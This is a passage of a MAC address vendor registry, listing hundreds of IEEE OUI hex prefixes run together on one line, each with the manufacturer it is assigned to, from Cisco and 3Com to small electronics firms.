Jiao Da HISYS Technology Co. Ltd. 0018AB BEIJING LHWT MICROELECTRONICS INC. 0018A5 ADigit Technologies Corp. 001878 Mackware GmbH 00186A Global Link Digital Technology Co,.LTD 00186B Sambu Communics CO., LTD. 00186E 3Com Ltd 0018A6 Persistent Systems, LLC 00189B Thomson Inc. 0018B2 ADEUNIS RF 0018B3 TEC WizHome Co., Ltd. 0018BD SHENZHEN DVBWORLD TECHNOLOGY CO., LTD. 001867 Datalogic ADC 001865 Siemens Healthcare Diagnostics Manufacturing Ltd 001877 Amplex A/S 001889 WinNet Solutions Limited 0017F9 Forcom Sp. z o.o. 0017F4 ZERON ALLIANCE 0017F7 CEM Solutions Pvt Ltd 0017ED WooJooIT Ltd. 001843 Dawevision Ltd 00182C Ascend Networks, Inc. 00181D ASIA ELECTRONICS CO.,LTD 00181F Palmmicro Communications 00181B TaiJin Metal Co., Ltd. 001805 Beijing InHand Networking Technology Co.,Ltd. 00180D Terabytes Server Storage Tech Corp 001854 Argard Co., Ltd 001847 AceNet Technology Inc. 001836 REJ Co.,Ltd 0017CC Alcatel-Lucent 0017C4 Quanta Microsystems, INC. 00179E Sirit Inc 0017A7 Mobile Computing Promotion Consortium 00179F Apricorn 0017B4 Remote Security Systems, LLC 0017AC O'Neil Product Development Inc. 0017AD AceNet Corporation 0017DD Clipsal Australia 0017D9 AAI Corporation 0017DC DAEMYUNG ZERO1 0017BF Coherent Research Limited 0017BD Tibetsystem 0017A1 3soft inc. 001792 Falcom Wireless Comunications Gmbh 001797 Telsy Elettronica S.p.A. 00178C Independent Witness, Inc 0017CB Juniper Networks 0017D3 Etymotic Research, Inc. 001788 Philips Lighting BV 00173C Extreme Engineering Solutions 001736 iiTron Inc. 001737 Industrie Dial Face S.p.A. 001733 SFR 001758 ThruVision Ltd 00174F iCatch Inc. 00174A SOCOMEC 00174E Parama-tech Co.,Ltd. 00176F PAX Computer Technology(Shenzhen) Ltd. 001771 APD Communications Ltd 00175B ACS Solutions Switzerland Ltd. 001729 Ubicod Co.LTD 001727 Thermo Ramsey Italia s.r.l. 00172A Proware Technology Corp.(By Unifosa) 001725 Liquid Computing 001764 ATMedia GmbH 00175E Zed-3 001766 Accense Technology, Inc. 0016D0 ATech elektronika d.o.o. 0016C3 BA Systems Inc 0016F0 Dell 0016F8 AVIQTECH TECHNOLOGY CO., LTD. 0016E8 Sigma Designs, Inc. 001703 MOSDAN Internation Co.,Ltd 0016FC TOHKEN CO.,LTD. 0016E9 Tiba Medical Inc 0016DC ARCHOS 001714 BR Controls Nederland bv 00171B Innovation Lab Corp. 001709 Exalt Communications 0016C1 Eleksen Ltd 0016A9 2EI 0016B0 VK Corporation 0016B1 KBS 0016AE INVENTEL 0016AC Toho Technology Corp. 001683 WEBIO International Co.,.Ltd. 001684 Donjin Co.,Ltd. 001687 Chubb CSC-Vendor AP 00167F Bluebird Soft Inc. 00164C PLANET INT Co., Ltd 001649 SetOne GmbH 001647 Cisco Systems, Inc 001665 Cellon France 00165F Fairmount Automation 00167C iRex Technologies BV 001673 Bury GmbH & Co. KG 001694 Sennheiser Communications A/S 00169C Cisco Systems, Inc 001657 Aegate Ltd 00168C DSL Partner AS 00161B Micronet Corporation 001618 HIVION Co., Ltd. 00161E Woojinnet 00161F SUNWAVETEC Co., Ltd. 001614 Picosecond Pulse Labs 00160E Optica Technologies Inc. 001643 Sunhillo Corporation 001644 LITE-ON Technology Corp. 00163E Xensource, Inc. 0015FD Complete Media Systems 0015F6 SCIENCE AND ENGINEERING SERVICES, INC. 001634 Mathtech, Inc. 00162C Xanboo 001605 YORKVILLE SOUND INC. 0015F9 Cisco Systems, Inc 0015E3 Dream Technologies Corporation 0015E0 Ericsson 0015F3 PELTOR AB 0015E7 Quantec Tontechnik 0015D3 Pantech&Curitel Communications, Inc. 0015AD Accedian Networks 0015AC Capelon AB 0015A9 KWANG WOO I&C CO.,LTD 00E0A8 SAT GmbH & Co. 001574 Horizon Semiconductors Ltd. 00158A SURECOM Technology Corp. 00158E Plustek.INC 001589 D-MAX Technology Co.,Ltd 0015B4 PolymapWireless LLC 0015CA TeraRecon, Inc. 001598 Kolektor group 001512 Zurich University of Applied Sciences 00150A Sonoa Systems, Inc 001570 Zebra Technologies Inc 00156E A. W. Communication Systems Ltd 001568 Dilithium Networks 00154B Wonde Proud Technology Co., Ltd 001548 CUBE TECHNOLOGIES 00155F GreenPeak Technologies 00155A DAINIPPON PHARMACEUTICAL CO., LTD. 00151D M2I CORPORATION 00153C Kprotech Co., Ltd. 00153A Shenzhen Syscan Technology Co.,Ltd. 001532 Consumer Technologies Group, LLC 00149B Nokota Communications, LLC 0014A1 Synchronous Communication Corp 00149E UbONE Co., Ltd 0014A2 Core Micro Systems Inc. 0014AD Gassner Wiege- und Meßtechnik GmbH 0014AF Datasym POS Inc. 0014A9 Cisco Systems, Inc 0014FF Precise Automation, Inc. 0014FA AsGa S.A. 0014FB Technical Solutions Inc. 0014D2 Kyuden Technosystems Corporation 0014DC Communication System Design & Manufacturing (CSDM) 0014CD DigitalZone Co., Ltd. 0014C0 Symstream Technology Group Ltd 0014C1 U.S. Robotics Corporation 0014C4 Vitelcom Mobile Technology 0014EC Acro Telecom 0014EB AwarePoint Corporation 0014AB Senhai Electronic Technology Co., Ltd. 0014B0 Naeil Community 0014F4 DekTec Digital Video B.V. 0014F5 OSI Security Devices 00148E Tele Power Inc. 00148F Protronic (Far East) Ltd. 00148C General Dynamics Mission Systems 001487 American Technology Integrators 001444 Grundfos Holding 001437 GSTeletech Co.,Ltd. 001431 PDL Electronics Ltd 00144D Intelligent Systems 00144A Taiwan Thick-Film Ind. Corp. 001445 Telefon-Gradnja d.o.o. 001468 CelPlan International, Inc. 00147C 3Com Ltd 001481 Multilink Inc 001464 Cryptosoft 00145E IBM Corp 001458 HS Automatic ApS 001421 Total Wireless Technologies Pte. Ltd. 001420 G-Links networking company 001418 C4Line 00141B Cisco Systems, Inc 0013F0 Wavefront Semiconductor 0013EF Kingjon Digital Technology Co.,Ltd 0013EB Sysmaster Corporation 0013EC Netsnapper Technologies SARL 00142B Edata Communication Inc. 00142C Koncept International, Inc. 001424 Merry Electrics CO., LTD. 0013D0 t+ Medical Ltd 0013D2 PAGE IBERICA, S.A. 0013D1 KIRK telecom A/S 00140F Federal State Unitary Enterprise Leningrad R&D Institute of 001407 Sperian Protection Instrumentation 001406 Go Networks 00140A WEPIO Co., Ltd. 0013FA LifeSize Communications, Inc 0013FB RKC INSTRUMENT INC. 0013DC IBTEK INC. 0013BA ReadyLinks Inc 0013B8 RyCo Electronic Systems Limited 0013B6 Sling Media, Inc. 00137D Dynalab, Inc. 001383 Application Technologies and Engineering Research Laboratory 001387 27M Technologies AB 001373 BLwave Electronics Co., Ltd 001366 Neturity Technologies Inc. 00135B PanelLink Cinema, LLC 00136F PacketMotion, Inc. 001368 Saab Danmark A/S 0013B4 Appear TV 0013AE Radiance Technologies, Inc. 001397 Oracle Corporation 0013C3 Cisco Systems, Inc 0013BD HYMATOM SA 001391 OUEN CO.,LTD. 001323 Cap Co., Ltd. 001314 Asiamajor Inc. 001316 L-S-B Broadcast Technologies GmbH 001312 Amedia Networks Inc. 001336 Tianjin 712 Communication Broadcasting co., ltd. 00135E EAB/RWI/K 00134E Valox Systems, Inc. 001344 Fargo Electronics Inc. 001348 Artila Electronics Co., Ltd. 0012EF OneAccess SA 0012E9 Abbey Systems Ltd 001300 IT-FACTORY, INC. 001322 DAQ Electronics, Inc. 0012D5 Motion Reality Inc. 0012D8 International Games System Co., Ltd. 00129A IRT Electronics Pty Ltd 00128D STB Datenservice GmbH 0012DB ZIEHL industrie-elektronik GmbH + Co KG 0012D6 Jiangsu Yitong High-Tech Co.,Ltd 0012DA Cisco Systems, Inc 0012D3 Zetta Systems, Inc. 0012A2 VITA 0012A5 Dolphin Interconnect Solutions AS 0012A8 intec GmbH 00129E Surf Communications Inc. 0012BA FSI Systems, Inc. 0012B2 AVOLITES LTD. 0012AE HLS HARD-LINE Solutions Inc. 0012AF ELPRO Technologies 0012E6 SPECTEC COMPUTER CO., LTD. 001236 ConSentry Networks 001235 Andrew Corporation 001245 Zellweger Analytics, Inc. 001242 Millennial Net 001241 a2i marketing center 00123B KeRo Systems ApS 001287 Digital Everywhere Unterhaltungselektronik GmbH 001282 Qovia 001285 Gizmondo Europe Ltd 001277 Korenix Technologies Co., Ltd. 00126D University of California, Berkeley 001267 Panasonic Corporation 001265 Enerdyne Technologies, Inc. 001257 LeapComm Communication Technologies Inc. 001251 SILINK 00128E Q-Free ASA 001292 Griffin Technology 0011F3 NeoMedia Europe AG 0011E9 STARNEX CO., LTD. 0011EC AVIX INC. 0011E7 WORLDSAT - Texas de France 001202 Decrane Aerospace - Audio International Inc. 0011FE Keiyo System Research, Inc. 0011FD KORG INC. 0011FA Rane Corporation 0011CE Ubisense Limited 0011D0 Tandberg Data ASA 0011C3 Transceiving System Technology Corporation 0011C2 United Fiber Optic Communication 001228 Data Ltd. 00121F Harding Instruments 001220 Cadco Systems 001229 BroadEasy Technologies Co.,Ltd 001226 Japan Direx Corporation 001222 Skardin (UK) Ltd 0011E8 Tixi.Com 0011E0 U-MEDIA Communications, Inc. 00120D Advanced Telecommunication Technologies, Inc. 00120E AboCom 0011F2 Institute of Network Technologies 001210 WideRay Corp 0011A4 JStream Technologies Inc. 001198 Prism Media Products Limited 001197 Monitoring Technologies Limited 001199 2wcom Systems GmbH 0011A7 Infilco Degremont Inc. 0011A9 MOIMSTONE Co., LTD 0011A3 LanReady Technologies Inc. 001176 Intellambda Systems, Inc. 001177 Coaxial Networks, Inc. 001170 GSC SRL 00116B Digital Data Communications Asia Co.,Ltd 001169 EMS Satcom 001162 STAR MICRONICS CO.,LTD. 001181 InterEnergy Co.Ltd, 001194 Chi Mei Communication Systems, Inc. 0011BF AESYS S.p.A. 0011B7 Octalix B.V. 0011B9 Inner Range Pty. Ltd. 001109 Micro-Star International 001104 TELEXY 001161 NetStreams, LLC 001156 Pharos Systems NZ 001159 MATISSE NETWORKS INC 00115C Cisco Systems, Inc 00115D Cisco Systems, Inc 001126 Venstar Inc. 00112E CEICOM 001122 CIMSYS Inc 001117 CESNET 001116 COTEAU VERT CO., LTD. 001110 Maxanna Technology Co., Ltd. 00113B Micronet Communications Inc. 00113D KN SOLTEC CO.,LTD. 001134 MediaCell, Inc. 001135 Grandeye Ltd 001121 Cisco Systems, Inc 001149 Proliphix Inc. 000FC0 DELCOMp 000FBA Tevebox AB 000FB8 CallURL Inc. 000FB7 Cavium 000FD3 Digium 000FD1 Applied Wireless Identifications Group, Inc. 000FC1 WAVE Corporation 001100 Schneider Electric 000FFA Optinel Systems, Inc. 000FFD Glorytek Network Inc. 000FF9 Valcretec, Inc. 000FC4 NST co.,LTD. 000FC9 Allnet GmbH 000FC6 Eurocom Industries A/S 000FBE e-w/you Inc. 000FA9 PC Fabrik 000FA0 CANON KOREA BUSINESS SOLUTIONS INC. 000F9A Synchrony, Inc. 000FEA Giga-Byte Technology Co.,LTD. 000FF7 Cisco Systems, Inc 000FD8 Force, Inc. 000F8D FAST TV-Server AG 000F85 ADDO-Japan Corporation 000F82 Mortara Instrument, Inc. 000F49 Northover Solutions Limited 000F4B Oracle Corporation 000F44 Tivella Inc. 000F4A Kyushu-kyohan co.,ltd 000F81 PAL Pacific Inc. 000F7F UBSTORAGE Co.,Ltd. 000F95 ELECOM Co.,LTD Laneed Division 000F55 Datawire Communication Networks Inc. 000F56 Continuum Photonics Inc 000F60 Lifetron Co.,Ltd 000F5B Delta Information Systems, Inc. 000F8A WideView 000F90 Cisco Systems, Inc 000F77 DENTUM CO.,LTD 000F7B Arce Sistemas, S.A. 000F68 Vavic Network Technology, Inc. 000EE2 Custom Engineering 000EE3 Chiyu Technology Co.,Ltd 000EE5 bitWallet, Inc. 000EDA C-TECH UNITED CORP. 000ECF PROFIBUS Nutzerorganisation e.V. 000EEB Sandmartin(zhong shan)Electronics Co.,Ltd 000EEC Orban 000EEF Private 000EF1 EZQUEST INC. 000EE7 AAC ELECTRONICS CORP. 000F1C DigitAll World Co., Ltd 000F1A Gaming Support B.V. 000F0A Clear Edge Networks 000F02 Digicube Technology Co., Ltd 000F2F W-LINX TECHNOLOGY CO., LTD. 000F2D CHUNG-HSIN ELECTRIC & MACHINERY MFG.CORP. 000EF7 Vulcan Portals Inc 000EF0 Festo AG & Co. KG 000EE9 WayTech Development, Inc. 000F40 Optical Internetworking Forum 000F33 DUALi Inc. 000F05 3B SYSTEM INC. 000EC9 YOKO Technology Corp. 000EBD Burdick, a Quinton Compny 000EB9 HASHIMOTO Electronics Industry Co.,Ltd. 000EB2 Micro-Research Finland Oy 000ED0 Privaris, Inc. 000EC3 Logic Controls, Inc. 000EC4 Iskra Transmission d.d. 000EC1 MYNAH Technologies 000E82 Commtech Wireless 000E89 CLEMATIC 000E79 Ample Communications Inc. 000EA1 Formosa Teletek Corporation 000E98 HME Clear-Com LTD. 000E99 Spectrum Digital, Inc 000E95 Fujiya Denki Seisakusho Co.,Ltd. 000E97 Ultracker Technology CO., Inc 000EA7 Endace Technology 000E6F IRIS Corporation Berhad 000EB5 Ecastle Electronics Co., Ltd. 000E50 Thomson Telecom Belgium 000E4B atrium c and i 000E2B Safari Technologies 000E28 Dynamic Ratings P/L 000E24 Huwell Technology Inc. 000E3F Soronti, Inc. 000E45 Beijing Newtry Electronic Technology Ltd 000E1D ARION Technology Inc. 000E12 Adaptive Micro Systems Inc. 000E4F Trajet GmbH 000E38 Cisco Systems, Inc 000E36 HEINESYS, Inc. 000E17 Private 000E15 Tadlys LTD 000E01 ASIP Technologies Inc. 000DCB Petcomkorea Co., Ltd. 000DCC NEOSMART Corp. 000DCE Dynavac Technology Pte Ltd 000DE8 Nasaco Electronics Pte. Ltd 000DE9 Napatech Aps 000DE6 YOUNGBO ENGINEERING CO.,LTD 000DC3 First Communication, Inc. 000DB9 PC Engines GmbH 000DB7 SANKO ELECTRIC CO,.LTD 000DAC Japan CBM Corporation 000DDF Japan Image & Network Inc. 000DDB AIRWAVE TECHNOLOGIES INC. 000E04 CMA/Microdialysis AB 000D2A Scanmatic AS 000D29 Cisco Systems, Inc 000D26 Primagraphics Limited 000D46 Parker SSD Drives 000D41 Siemens AG ICM MP UC RD IT KLF1 000D42 Newbest Development Limited 000D3C i.Tech Dynamic Ltd 000D55 SANYCOM Technology Co.,Ltd 000D57 Fujitsu I-Network Systems Limited. 000D58 Private 000D51 DIVR Systems, Inc. 000D39 Network Electronics 000D35 PAC International Ltd 000D95 Opti-cell, Inc. 000D91 Eclipse (HQ Espana) S.L. 000D62 Funkwerk Dabendorf GmbH 000D65 Cisco Systems, Inc 000D45 Tottori SANYO Electric Co., Ltd. 000DA1 MIRAE ITS Co.,LTD. 000D80 Online Development Inc 000D13 Wilhelm Rutenbeck GmbH&Co.KG 000D19 ROBE Show lighting 000D1C Amesys Defense 000CED Real Digital Media 000CF0 M & N GmbH 000CF4 AKATSUKI ELECTRIC MFG.CO.,LTD. 000CF3 CALL IMAGE SA 000CCF Cisco Systems, Inc 000CD8 M. K. Juchheim GmbH & Co 000CC6 Ka-Ro electronics GmbH 000D01 P&E Microcomputer Systems, Inc. 000D00 Seaway Networks Inc. 000CF9 Xylem Water Solutions 000CC4 Tiptel AG 000CBA Jamex, Inc. 000CD1 SFOM Technology Corp. 000CCE Cisco Systems, Inc 000CE0 Trek Diagnostics Inc. 000CE2 Rolls-Royce 000D0C MDI Security Systems 000D16 UHS Systems Pty Ltd 000D1F AV Digital 000CAD BTU International 000CAA Cubic Transportation Systems Inc 000CAC Citizen Watch Co., Ltd. 000CAE Ailocom Oy 000CA3 Rancho Technology, Inc. 000C9C Chongho information & communications 000C97 NV ADB TTV Technologies SA 000C8F Nergal s.r.l. 000C92 WolfVision Gmbh 000C93 Xeline Co., Ltd. 000C7F synertronixx GmbH 000C81 Schneider Electric (Australia) 000C9E MemoryLink Corp. 000C95 PrimeNet 000C76 MICRO-STAR INTERNATIONAL CO., LTD. 000C80 Opelcomm Inc. 000C7D TEIKOKU ELECTRIC MFG. CO., LTD 000CB7 Nanjing Huazhuo Electronics Co., Ltd. 000C68 SigmaTel, Inc. 000C07 Iftest AG 000C0C APPRO TECHNOLOGY INC. 000C0E XtremeSpectrum, Inc. 000C12 Micro-Optronic-Messtechnik GmbH 000C10 PNI Corporation 000C40 Altech Controls 000C3E Crest Audio 000C3A Oxance 000C35 KaVo Dental GmbH & Co. KG 000C56 Megatel Computer (1986) Corp. 000C57 MACKIE Engineering Services Belgium BVBA 000C23 Beijing Lanchuan Tech. Co., Ltd. 000C25 Allied Telesis Labs, Inc. 000C18 Zenisu Keisoku Inc. 000C0A Guangdong Province Electronic Technology Research Institute 000C0B Broadbus Technologies 000C4A Cygnus Microsystems (P) Limited 000C54 Pedestal Networks, Inc 000C37 Geomation, Inc. 000BE8 AOIP 000BDC AKCP 000BD8 Industrial Scientific Corp. 000BD7 DORMA Time + Access GmbH 000BDD TOHOKU RICOH Co., LTD. 000BE5 HIMS International Corporation 000BE9 Actel Corporation 000BE3 Key Stream Co., Ltd. 000BD3 cd3o 000BD5 Nvergence, Inc. 000BD1 Aeronix, Inc. 000BD2 Remopro Technology Inc. 000BC7 ICET S.p.A. 000BB8 Kihoku Electronic Co. 000BC0 China IWNComm Co., Ltd. 000BB0 Sysnet Telematica srl 000BB4 RDC Semiconductor Inc., 000BCC JUSAN, S.A. 000BAC 3Com Ltd 000BF9 Gemstone Communications, Inc. 000BFC Cisco Systems, Inc 000BEA Zultys Technologies 000B9F Neue ELSA GmbH 000B98 NiceTechVision 000B95 eBet Gaming Systems Pty Ltd 000B9E Yasing Technology Corp. 000B88 Vidisco ltd. 000B54 BiTMICRO Networks, Inc. 000B8C Flextronics 000B8A MITEQ Inc. 000B90 ADVA Optical Networking Ltd. 000B79 X-COM, Inc. 000B4B VISIOWAVE SA 000B36 Productivity Systems, Inc. 000B35 Quad Bit System co., Ltd. 000B75 Iosoft Ltd. 000B70 Load Technology, Inc. 000B6F Media Streaming Networks Inc 000B43 Microscan Systems, Inc. 000B45 Cisco Systems, Inc 000B4C Clarion (M) Sdn Bhd 000B63 Kaleidescape 000B68 Addvalue Communications Pte Ltd 000B58 Astronautics C.ALTD 000B55 ADInstruments 000B87 American Reliance Inc. 000B0D Air2U, Inc. 000B0B Corrent Corporation 000B08 Pillar Data Systems 000B27 Scion Corporation 000B21 G-Star Communications Inc. 000ADA Vindicator Technologies 000AC9 Zambeel Inc 000B25 Aeluros 000B1A Industrial Defender, Inc. 000B18 Private 000B15 Platypus Technology 000AFA Traverse Technologies Australia 000AFC Core Tec Communications, LLC 000AEC Koatsu Gas Kogyo Co., Ltd. 000AE7 ELIOP S.A. 000AE8 Cathay Roxus Information Technology Co. LTD 000ADD Allworx Corp. 000AE1 EG Technology 000ADF Gennum Corporation 000B3F Anthology Solutions Inc. 000B3C Cygnal Integrated Products, Inc. 000AF1 Clarity Design, Inc. 000AF3 Cisco Systems, Inc 000A8D EUROTHERM LIMITED 000A9F Pannaway Technologies, Inc. 000A8F Aska International Inc. 000AA0 Cedar Point Communications 000A8E Invacom Ltd 000AC1 Futuretel 000ABE OPNET Technologies CO., LTD. 000AC3 eM Technics Co., Ltd. 000AC4 Daewoo Teletech Co., Ltd 000AC0 Fuyoh Video Industry CO., LTD. 000AAE Rosemount Process Analytical 000AB3 Fa. GIRA 000ABA Arcon Technology Limited 000AB6 COMPUNETIX, INC 000AAF Pipal Systems 000A76 Beida Jade Bird Huaguang Technology Co.,Ltd 000AB2 Fresnel Wireless Systems 000AAA AltiGen Communications Inc. 000A99 Calamp Wireless Networks Inc 000A93 W2 Networks, Inc. 000A89 Creval Systems, Inc. 000A80 Telkonet Inc. 000A79 corega K.K 000A5C Carel s.p.a. 000A5A GreenNET Technologies Co.,Ltd. 000A56 HITACHI Maxell Ltd. 000A51 GyroSignal Technology Co., Ltd. 000A2C Active Tchnology Corporation 000A2A QSI Systems Inc. 000A23 Parama Networks Inc 000A1F ART WARE Telecommunication Co., Ltd. 000A0A SUNIX Co., Ltd. 000A05 Widax Corp. 000A34 Identicard Systems Incorporated 000A30 Visteon Corporation 000A2F Artnix Inc. 000A15 Silicon Data, Inc 000A1B Stream Labs 000A1A Imerge Ltd 000A60 Autostar Technology Pte Ltd 000A5D FingerTec Worldwide Sdn Bhd 000A39 LoPA Information Technology 000A37 Procera Networks, Inc. 000A53 Intronics, Incorporated 000A4A Targa Systems Ltd. 0009D6 KNC One GmbH 0009C7 Movistec 0009C9 BlueWINC Co., Ltd. 0009D4 Transtech Networks 0009CB HBrain 0009F1 Yamaki Electric Corporation 0009F4 Alcon Laboratories, Inc. 0009F5 Emerson Network Power Co.,Ltd 0009EA YEM Inc. 0009C5 KINGENE Technology Corporation 0009CD HUDSON SOFT CO.,LTD. 0009C0 6WIND 0009BF Nintendo Co., Ltd. 0009E3 Angel Iglesias S.A. 0009B4 KISAN TELECOM CO., LTD. 0009AE OKANO ELECTRIC CO.,LTD 0009BA MAKU Informationstechik GmbH 000A04 3Com Ltd 000971 Time Management, Inc. 000974 Innopia Technologies, Inc. 00098B Entropic Communications, Inc. 00097E IMI TECHNOLOGY CO., LTD 00096A Cloverleaf Communications Inc. 00095A RACEWOOD TECHNOLOGY 00094E BARTECH SYSTEMS INTERNATIONAL, INC 000947 Aztek, Inc. 000951 Apogee Imaging Systems 00093D Newisys,Inc. 000967 Tachyon, Inc 000996 RDI 00090C Mayekawa Mfg. Co. Ltd. 00090D LEADER ELECTRONICS CORP. 0008FE UNIK C&C Co.,Ltd. 0008FF Trilogy Communications Ltd 000904 MONDIAL electronic 00091F A&D Co., Ltd. 000924 Telebau GmbH 000921 Planmeca Oy 000919 MDS Gateways 000918 SAMSUNG TECHWIN CO.,LTD 00092F Akom Technology Corporation 0008EF DIBAL,S.A. 0008F0 Next Generation Systems, Inc. 0008E9 NextGig 000910 Simple Access Inc. 000914 COMPUTROLS INC. 0008E7 SHI ControlSystems,Ltd. 0008D7 HOW CORPORATION 0008FC Gigaphoton Inc. 000938 Allot Communications 0008BF Aptus Elektronik AB 0008B8 E.F. Johnson 0008BB NetExcell 0008BE XENPAK MSA Group 0008C1 Avistar Communications Corporation 0008C6 Philips Consumer Communications 000865 JASCOM CO., LTD 000864 Fasy S.p.A. 000860 LodgeNet Entertainment Corp. 000897 Quake Technologies 000890 AVILINKS SA 00088D Sigma-Links Inc. 0008A8 Systec Co., Ltd. 0008A4 Cisco Systems, Inc 08006B ACCEL TECHNOLOGIES INC. 000884 Index Braille AB 0007E8 EdgeWave 0007EB Cisco Systems, Inc 0007EC Cisco Systems, Inc 000851 Canadian Bank Note Company, Ltd. 000859 ShenZhen Unitone Electronics Co., Ltd. 00084E DivergeNet, Inc. 000819 Banksys 00081A Sanrad Intelligence Storage Communications (2000) Ltd. 000810 Key Technology, Inc. 000807 Access Devices Limited 0007FC Adept Systems Inc. 000825 Acme Packet 0007DC Atek Co, Ltd. 00081F Pou Yuen Tech Corp. Ltd. 0007C6 VDS Vosskuhler GmbH 0007F5 Bridgeco Co AG 000794 Simple Devices, Inc. 000797 Netpower Co., Ltd. 00078C Elektronikspecialisten i Borlange AB 0007CC Kaba Benzing GmbH 0007C0 NetZerver Inc. 00047E Siqura B.V. 0007BC Identix Inc. 0007A9 Novasonics 0007A1 VIASYS Healthcare GmbH 00079E Ilinx Co., Ltd. 0007A0 e-Watch Inc. 000788 Clipcomm, Inc. 000781 Itron Inc. 00076B Stralfors AB 000768 Danfoss A/S 00075F VCS Video Communication Systems AG 0007B8 Corvalent Corporation 00077B Millimetrix Broadband Networks 000769 Italiana Macchi SpA 00071A Finedigital Inc. 00071E Tri-M Engineering / Nupak Dev. Corp. 000717 Wieland Electric GmbH 000711 Acterna 000702 Varex Imaging 000705 Endress & Hauser GmbH & Co 0006FF Sheba Systems Co., Ltd. 000741 Sierra Automated Systems 000745 Radlan Computer Communications Ltd. 00073E China Great-Wall Computer Shenzhen Co., Ltd. 000733 DANCONTROL Engineering 00072B Jung Myung Telecom Co., Ltd. 000718 iCanTek Co., Ltd. 000716 J & S Marine Ltd. 00075C Eastman Kodak Company 000756 Juyoung Telecom 00075A Air Products and Chemicals, Inc. 000748 The Imaging Source Europe 000746 TURCK, Inc. 00073B Tenovis GmbH & Co KG 000731 Ophir-Spiricon LLC 00070A Unicom Automation Co., Ltd. 000709 Westerstrand Urfabrik AB 0006EB Global Data 0006D3 Alpha Telecom, Inc. U.S.A. 000647 Etrali S.A. 0006A4 INNOWELL Corp. 0006D6 Cisco Systems, Inc 0006CB Jotron Electronics A/S 0006CD Leaf Imaging Ltd. 000695 Ensure Technologies, Inc. 000691 PT Inovacao 000692 Intruvert Networks, Inc. 00068B AirRunner Technologies, Inc. 000688 Telways Communication Co., Ltd. 0006AB W-Link Systems, Inc. 0006AC Intersoft Co. 000694 Mobillian Corporation 0006C7 RFNET Technologies Pte Ltd (S) 0006B9 A5TEK Corp. 0006B3 Diagraph Corporation 0006E3 Quantitative Imaging Corporation 0006E4 Citel Technologies Ltd. 0006A1 Celsian Technologies, Inc. 0006D9 IPM-Net S.p.A. 000663 Human Technology Co., Ltd. 000665 Sunny Giken, Inc. 000669 Datasound Laboratories Ltd 00066E Delta Electronics, Inc. 00061B Notebook Development Lab.Lenovo Japan Ltd. 00060F Narad Networks Inc 000610 Abeona Networks Inc 000611 Zeus Wireless, Inc. 0005EC Mosaic Systems Inc. 000662 MBM Technology Ltd. 00065A Strix Systems 000652 Cisco Systems, Inc 000656 Tactel AB 000641 ITCN 000648 Seedsware, Inc. 00064C Invicta Networks, Inc. 000674 Spectrum Control, Inc. 000638 Sungjin C&C Co., Ltd. 000635 PacketAir Networks, Inc. 00061A Zetari Inc. 00061F Vision Components GmbH 000687 Omnitron Systems Technology, Inc. 000602 Cirkitech Electronics Co. 0005C0 Digital Network Alacarte Co., Ltd. 0005B8 Electronic Design Associates, Inc. 0005BA Area Netwoeks, Inc. 0005BF JustEzy Technology, Inc. 0005D5 Speedcom Wireless 0005C5 Flaga HF 0005CA Hitron Technology, Inc. 0005D2 DAP Technologies 0005B1 ASB Technology BV 000599 DRS Test and Energy Management or DRS-TEM 00059A Cisco Systems, Inc 0005AB Cyber Fone, Inc. 000592 Pultek Corp. 00058B IPmental, Inc. 0005AC Northern Digital, Inc. 0005AD Topspin Communications, Inc. 0005D1 Metavector Technologies 0005FB ShareGate, Inc. 0005FE Traficon N.V. 0005F0 SATEC 000530 Andiamo Systems, Inc. 000538 Merilus, Inc. 00052B HORIBA, Ltd. 00051D Airocon, Inc. 000515 Nuark Co., Ltd. 000516 SMART Modular Technologies 000577 SM Information & Communication 000570 Baydel Ltd. 00056E National Enhance Technology, Inc. 00056D Pacific Corporation 000581 Snell 00057D Sun Communications, Inc. 000586 Lucent Technologies 00057B Chung Nam Electronic Co., Ltd. 000571 Seiwa Electronics Co. 000549 Salira Optical Network Systems 00054C RF Innovations Pty Ltd 000543 IQ Wireless GmbH 00055C Kowa Company, Ltd. 000510 Infinite Shanghai Communication Terminals Ltd. 0004FF Acronet Co., Ltd. 000501 Cisco Systems, Inc 000508 Inetcam, Inc. 00051B Magic Control Technology Corporation 000513 VTLinx Multimedia Systems, Inc. 00050E 3ware, Inc. 0004D7 Omitec Instrumentation Ltd. 0004D4 Proview Electronics Co., Ltd. 0004DB Tellus Group Corp. 0004E0 Procket Networks 0004DD Cisco Systems, Inc 008086 COMPUTER GENERATION INC. 000504 Naray Information & Communication Enterprise 000509 AVOC Nishimura Ltd. 0004FB Commtech, Inc. 0004C0 Cisco Systems, Inc 0004BA KDD Media Will Corporation 0004B6 Stratex Networks, Inc. 0004CD Extenway Solutions Inc 0004E9 Infiniswitch Corporation 0004E8 IER, Inc. 0004B3 Videotek, Inc. 00044C JENOPTIK 000444 Western Multiplex Corporation 000439 Rosco Entertainment Technology, Inc. 00043A Intelligent Telecommunications, Inc. 000492 Hive Internet, Ltd. 00048C Nayna Networks, Inc. 000491 Technovision, Inc. 000493 Tsinghua Unisplendour Co., Ltd. 000494 Breezecom, Ltd. 000489 YAFO Networks, Inc. 00048A Temia Vertriebs GmbH 000481 Econolite Control Products, Inc. 00046C Cyber Technology Co., Ltd. 000471 IPrad 00046E Cisco Systems, Inc 000474 LEGRAND 00042D Sarian Systems, Ltd. 00042E Netous Technologies, Ltd. 000425 Atmel Corporation 00043F ESTeem Wireless Modems, Inc 000433 Cyberboard A/S 000434 Accelent Systems, Inc. 000477 Scalant Systems, Inc. 000473 Photonex Corporation 000470 ipUnplugged AB 00045D BEKA Elektronik 000459 Veristar Corporation 0004A4 NetEnabled, Inc. 000416 Parks S/A Comunicacoes Digitais 00040F Asus Network Technologies, Inc. 00040A Sage Systems 000404 Makino Milling Machine Co., Ltd. 0003D0 KOANKEISO Co., Ltd. 0003CF Muxcom, Inc. 0003D1 Takaya Corporation 0003AD Emerson Energy Systems AB 0003A7 Unixtar Technology, Inc. 0003AE Allied Advanced Manufacturing Pte, Ltd. 0003A3 MAVIX, Ltd. 0003B6 QSI Corporation 0003B1 Hospira Inc. 0003B3 IA Link Systems Co., Ltd. 0003EB Atrica 0003E7 Logostek Co. Ltd. 0003E3 Cisco Systems, Inc 0003F4 NetBurner 0003F2 Seneca Networks 0003F0 Redfern Broadband Networks 0003DB Apogee Electronics Corp. 0003D2 Crossbeam Systems, Inc. 000405 ACN Technologies 000401 Osaki Electric Co., Ltd. 00041B Bridgeworks Ltd. 0003A1 HIPER Information & Communication, Inc. 000396 EZ Cast Co., Ltd. 00039A SiConnect 000363 Miraesys Co., Ltd. 00035F Prüftechnik Condition Monitoring GmbH & Co. KG 000360 PAC 